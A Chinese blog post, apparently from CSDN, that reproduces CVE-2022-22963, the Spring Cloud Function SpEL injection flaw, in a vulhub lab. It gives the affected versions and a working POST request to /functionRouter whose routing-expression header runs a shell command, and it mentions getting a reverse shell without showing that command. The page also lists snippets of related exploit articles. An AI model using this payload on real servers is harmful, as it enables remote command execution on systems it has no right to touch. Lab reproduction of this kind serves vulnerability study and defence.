漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞

最新推荐文章于 2024-03-16 15:37:31 发布
最新推荐文章于 2024-03-16 15:37:31 发布
阅读量1.7k 收藏
点赞数
分类专栏: 渗透测试 web 文章标签: spring cloud 安全 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65454485/article/details/126225581
版权

0x00 实验环境

攻击机:192.168.172.128 #攻击机/反弹shell

靶场:vulhub搭建的靶场环境(192.168.172.128)

0x01 影响版本

3.0.0 <= Spring Cloud Function <= 3.2.2

0x02 漏洞复现

  1. 访问页面,默认页面:

直接访问 http://192.168.172.128:8080/ 是一个错误页面

2. 漏洞复现

访问http://192.168.172.128:8080/fuctionRouter并且抓包,修改请求方式为POST,并且还要添加spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("要执行的命令"),由于无法回显,我这里执行的是创建一个文件,然后再到docker容器内部查看是否创建成功来确定是否成功执行了命令。

POST /functionRouter HTTP/1.1

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/RCE")

 进入到docker容器内部,docker-compose exec spring bash,发现创建成功

 反弹shell

 

成功收到反弹过来的shell

 在监听中成功接受到了shell

阜阳第一菜鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2022-22963 Demo
04-14
CVE-2022-22963 Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
『Java CVE』CVE-2022-22963: Spring Cloud Function SPEL表达式注入RCE
Ho1aAs‘s Blog
07-28 1385
## 漏洞简介 向`/functionRouter`路由发送headers带有`spring.cloud.function.routing-expression`键的POST包时,会触发SPEL解析该键值 ## 影响范围 3.0.0
春秋云境CVE-2023-27372
最新发布
m0_64432806的博客
03-16 477
SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞
Spring Cloud Function SpEL表达式注入漏洞
04-06 3935
漏洞描述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 影响版本 Spring Cloud Function SPEL表达式注入漏洞影响范围: 3 <= spring-cloud-function-context <= 3.2.
Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)
chaojixiaojingang
04-06 7529
1.漏洞描述 SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
CVE-2022-22963-Spring-Core-RCE图形化利用工具
LiBai'S BLOG
04-01 9670
CVE-2022-22963 描述:Spring4Shell - Spring Core RCE - CVE-2022-22965 链接:https://github.com/TheGejr/SpringShell 描述:Spring4Shell Proof Of Concept/Information CVE-2022-22965 链接:https://github.com/BobTheShoplifter/Spring4Shell-POC 描述:This includes CVE-2022-22
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实过程中看起来并不乐观。 我们在...
远程执行代码漏洞(CVE-2018-0886)漏洞
08-21
CVE-2018-0886 CVE-2018-0886 Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886) windows安全漏洞,亲测有效
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 629
[春秋云镜]CVE-2022-22963
CVE-2022-22963:Spring Cloud Function SpEL 远程代码执行漏洞
m0_59092234的博客
09-02 759
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手最近Spring Cloud Function组件爆出0day – SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。
Spring Cloud FunctionRCE 0-day漏洞
HongYu012的博客
03-27 8283
近日,Spring Cloud Function 官方测试用例曝光了 Spring Cloud Function SPEL 表达式注入漏洞,可利用该漏洞通过注入 SPEL 表达式来触发远程命令执行。 Spring Cloud Function 是一个基于 Spring Boot 的函数计算框架。通过抽象传输细节和基础设施,为开发者保留熟悉的开发工具和开发流程,让开发者专注于实业务逻辑,从而提高开发效率。 Spring Cloud Function 是一个具有以下高级目标的项目: 通过函数促进业务逻辑
cve-2022-30190 msdt远程代码执行漏洞
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值